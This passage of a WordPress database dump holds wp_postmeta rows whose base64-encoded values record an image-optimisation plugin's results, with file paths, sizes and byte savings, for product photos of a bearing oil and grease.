N0aW9uIjo1NjQsInRpbWUiOjE0ODM1NzgwMDcsImlkIjoxMDM3fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctb2lsLWdyZWFzZS0xMS0yNDd4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLW9pbC1ncmVhc2UtMTEtMjQ3eDMwMC5qcGciLCJ3aWR0aCI6IjI0NyIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9rcnl0b3gtYmVhcmluZy1vaWwtZ3JlYXNlLTExLTI0N3gzMDAuanBnIiwicmVkdWN0aW9uIjo3NjksInRpbWUiOjE0ODM1NzgwMTEsImlkIjoxMDM3fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctb2lsLWdyZWFzZS0xMS0zMDB4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLW9pbC1ncmVhc2UtMTEtMzAweDMwMC5qcGciLCJ3aWR0aCI6IjMwMCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9rcnl0b3gtYmVhcmluZy1vaWwtZ3JlYXNlLTExLTMwMHgzMDAuanBnIiwicmVkdWN0aW9uIjo4MjksInRpbWUiOjE0ODM1NzgwMTQsImlkIjoxMDM3fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctb2lsLWdyZWFzZS0xMS00MDB4NDAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLW9pbC1ncmVhc2UtMTEtNDAweDQwMC5qcGciLCJ3aWR0aCI6IjQwMCIsImhlaWdodCI6IjQwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9rcnl0b3gtYmVhcmluZy1vaWwtZ3JlYXNlLTExLTQwMHg0MDAuanBnIiwicmVkdWN0aW9uIjoxMTQwLCJ0aW1lIjoxNDgzNTc4MDE4LCJpZCI6MTAzN31d'); 
INSERT INTO `wp_postmeta` VALUES (29824, 1036, 'wpfc_optimisation_reduction', '15660'); 
INSERT INTO `wp_postmeta` VALUES (29825, 1036, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctb2lsLWdyZWFzZS0xMC5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLW9pbC1ncmVhc2UtMTAuanBnIiwid2lkdGgiOjUxODQsImhlaWdodCI6MzQ1NiwibWltZV90eXBlIjoiIiwiZXJyb3JfY29kZSI6OSwidGltZSI6MTQ4MzU3ODAyMywiaWQiOiIxMDM2In0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtYmVhcmluZy1vaWwtZ3JlYXNlLTEwLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctb2lsLWdyZWFzZS0xMC0zNDB4MzQwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLW9pbC1ncmVhc2UtMTAtMzQweDM0MC5qcGciLCJyZWR1Y3Rpb24iOjcwMiwidGltZSI6MTQ4MzU3ODAyNiwiaWQiOjEwMzZ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctb2lsLWdyZWFzZS0xMC04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLW9pbC1ncmVhc2UtMTAtODAweDUzMy5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9rcnl0b3gtYmVhcmluZy1vaWwtZ3JlYXNlLTEwLTgwMHg1MzMuanBnIiwicmVkdWN0aW9uIjoxNjA5LCJ0aW1lIjoxNDgzNTc4MDMwLCJpZCI6MTAzNn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtYmVhcmluZy1vaWwtZ3JlYXNlLTEwLTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctb2lsLWdyZWFzZS0xMC03Njh4NTEyLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLW9pbC1ncmVhc2UtMTAtNzY4eDUxMi5qcGciLCJyZWR1Y3Rpb24iOjE0NjEsInRpbWUiOjE0ODM1NzgwMzQsImlkIjoxMDM2fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLW9pbC1ncmVhc2UtMTAtMTYwMHgxMDY3LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjcsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctb2lsLWdyZWFzZS0xMC0xNjAweDEwNjcuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctb2lsLWdyZWFzZS0xMC0xNjAweDEwNjcuanBnIiwicmVkdWN0aW9uIjo1Nzg4LCJ0aW1lIjoxNDgzNTc4MDM5LCJpZCI6MTAzNn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtYmVhcmluZy1vaWwtZ3JlYXNlLTEwLTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctb2lsLWdyZWFzZS0xMC0yNTB4MjUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLW9pbC1ncmVhc2UtMTAtMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjUxOCwidGltZSI6MTQ4MzU3ODA0MiwiaWQiOjEwMzZ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctb2lsLWdyZWFzZS0xMC0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLW9pbC1ncmVhc2UtMTAtMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9rcnl0b3gtYmVhcmluZy1vaWwtZ3JlYXNlLTEwLTIwMHgyMDAuanBnIiwicmVkdWN0aW9uIjo0ODUsInRpbWUiOjE0ODM1NzgwNDUsImlkIjoxMDM2fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLW9pbC1ncmVhc2UtMTAtMjI1eDIyNS5qcGciLCJ3aWR0aCI6MjI1LCJoZWlnaHQiOjIyNSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtYmVhcmluZy1vaWwtZ3JlYXNlLTEwLTIyNXgyMjUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctb2lsLWdyZWFzZS0xMC0yMjV4MjI1LmpwZyIsInJlZHVjdGlvbiI6NTE4LCJ0aW1lIjoxNDgzNTc4MDQ5LCJpZCI6MTAzNn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtYmVhcmluZy1vaWwtZ3JlYXNlLTEwLTUxMHg2MDAuanBnIiwid2lkdGgiOjUxMCwiaGVpZ2h0Ijo2MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctb2lsLWdyZWFzZS0xMC01MTB4NjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLW9pbC1ncmVhc2UtMTAtNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjEwODQsInRpbWUiOjE0ODM1NzgwNTIsImlkIjoxMDM2fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctb2lsLWdyZWFzZS0xMC0xMTR4MTMwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLW9pbC1ncmVhc2UtMTAtMTE0eDEzMC5qcGciLCJ3aWR0aCI6IjExNCIsImhlaWdodCI6IjEzMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9rcnl0b3gtYmVhcmluZy1vaWwtZ3JlYXNlLTEwLTExNHgxMzAuanBnIiwicmVkdWN0aW9uIjo0MjQsInRpbWUiOjE0ODM1NzgwNTYsImlkIjoxMDM2fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctb2lsLWdyZWFzZS0xMC0xNjB4MTYwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLW9pbC1ncmVhc2UtMTAtMTYweDE2MC5qcGciLCJ3aWR0aCI6IjE2MCIsImhlaWdodCI6IjE2MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9rcnl0b3gtYmVhcmluZy1vaWwtZ3JlYXNlLTEwLTE2MHgxNjAuanBnIiwicmVkdWN0aW9uIjo0NTMsInRpbWUiOjE0ODM1NzgwNTksImlkIjoxMDM2fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctb2lsLWdyZWFzZS0xMC0xODB4MTgwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLW9pbC1ncmVhc2UtMTAtMTgweDE4MC5qcGciLCJ3aWR0aCI6IjE4MCIsImhlaWdodCI6IjE4MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9rcnl0b3gtYmVhcmluZy1vaWwtZ3JlYXNlLTEwLTE4MHgxODAuanBnIiwicmVkdWN0aW9uIjo0OTcsInRpbWUiOjE0ODM1NzgwNjIsImlkIjoxMDM2fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctb2lsLWdyZWFzZS0xMC0yNDd4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLW9pbC1ncmVhc2UtMTAtMjQ3eDMwMC5qcGciLCJ3aWR0aCI6IjI0NyIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9rcnl0b3gtYmVhcmluZy1vaWwtZ3JlYXNlLTEwLTI0N3gzMDAuanBnIiwicmVkdWN0aW9uIjo2MjEsInRpbWUiOjE0ODM1NzgwNjYsImlkIjoxMDM2fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctb2lsLWdyZWFzZS0xMC0zMDB4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLW9pbC1ncmVhc2UtMTAtMzAweDMwMC5qcGciLCJ3aWR0aCI6IjMwMCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9rcnl0b3gtYmVhcmluZy1vaWwtZ3JlYXNlLTEwLTMwMHgzMDAuanBnIiwicmVkdWN0aW9uIjo2NzQsInRpbWUiOjE0ODM1NzgwNjksImlkIjoxMDM2fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctb2lsLWdyZWFzZS0xMC00MDB4NDAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLW9pbC1ncmVhc2UtMTAtNDAweDQwMC5qcGciLCJ3aWR0aCI6IjQwMCIsImhlaWdodCI6IjQwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9rcnl0b3gtYmVhcmluZy1vaWwtZ3JlYXNlLTEwLTQwMHg0MDAuanBnIiwicmVkdWN0aW9uIjo4MjYsInRpbWUiOjE0ODM1NzgwNzMsImlkIjoxMDM2fV0='); 
INSERT INTO `wp_postmeta` VALUES (29826, 1030, 'wpfc_optimisation_reduction', '26079'); 
INSERT INTO `wp_postmeta` VALUES (29827, 1030, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctb2lsLWdyZWFzZS05LmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctb2lsLWdyZWFzZS05LmpwZyIsIndpZHRoIjo0ODAwLCJoZWlnaHQiOjY0MDAsIm1pbWVfdHlwZSI6IiIsImVycm9yX2NvZGUiOjksInRpbWUiOjE0ODM1NzgwNzgsImlkIjoiMTAzMCJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctb2lsLWdyZWFzZS05LTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctb2lsLWdyZWFzZS05LTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctb2lsLWdyZWFzZS05LTM0MHgzNDAuanBnIiwicmVkdWN0aW9uIjo4MzgsInRpbWUiOjE0ODM1NzgwODEsImlkIjoxMDMwfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLW9pbC1ncmVhc2UtOS02MDB4ODAwLmpwZyIsIndpZHRoIjo2MDAsImhlaWdodCI6ODAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLW9pbC1ncmVhc2UtOS02MDB4ODAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLW9pbC1ncmVhc2UtOS02MDB4ODAwLmpwZyIsInJlZHVjdGlvbiI6MjczOSwidGltZSI6MTQ4MzU3ODA4NSwiaWQiOjEwMzB9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctb2lsLWdyZWFzZS05LTc2OHgxMDI0LmpwZyIsIndpZHRoIjo3NjgsImhlaWdodCI6MTAyNCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtYmVhcmluZy1vaWwtZ3JlYXNlLTktNzY4eDEwMjQuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctb2lsLWdyZWFzZS05LTc2OHgxMDI0LmpwZyIsInJlZHVjdGlvbiI6NDM0OCwidGltZSI6MTQ4MzU3ODA4OCwiaWQiOjEwMzB9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctb2lsLWdyZWFzZS05LTEyMDB4MTYwMC5qcGciLCJ3aWR0aCI6MTIwMCwiaGVpZ2h0IjoxNjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLW9pbC1ncmVhc2UtOS0xMjAweDE2MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctb2lsLWdyZWFzZS05LTEyMDB4MTYwMC5qcGciLCJyZWR1Y3Rpb24iOjExMDQ2LCJ0aW1lIjoxNDgzNTc4MDkyLCJpZCI6MTAzMH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtYmVhcmluZy1vaWwtZ3JlYXNlLTktMjUweDI1MC5qcGciLCJ3aWR0aCI6MjUwLCJoZWlnaHQiOjI1MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtYmVhcmluZy1vaWwtZ3JlYXNlLTktMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9rcnl0b3gtYmVhcmluZy1vaWwtZ3JlYXNlLTktMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjU5MSwidGltZSI6MTQ4MzU3ODA5NiwiaWQiOjEwMzB9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctb2lsLWdyZWFzZS05LTIwMHgyMDAuanBnIiwid2lkdGgiOjIwMCwiaGVpZ2h0IjoyMDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctb2lsLWdyZWFzZS05LTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctb2lsLWdyZWFzZS05LTIwMHgyMDAuanBnIiwicmVkdWN0aW9uIjo1MjMsInRpbWUiOjE0ODM1NzgwOTksImlkIjoxMDMwfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLW9pbC1ncmVhc2UtOS0yMjV4MjI1LmpwZyIsIndpZHRoIjoyMjUsImhlaWdodCI6MjI1LCJ1cmwiOiJodHR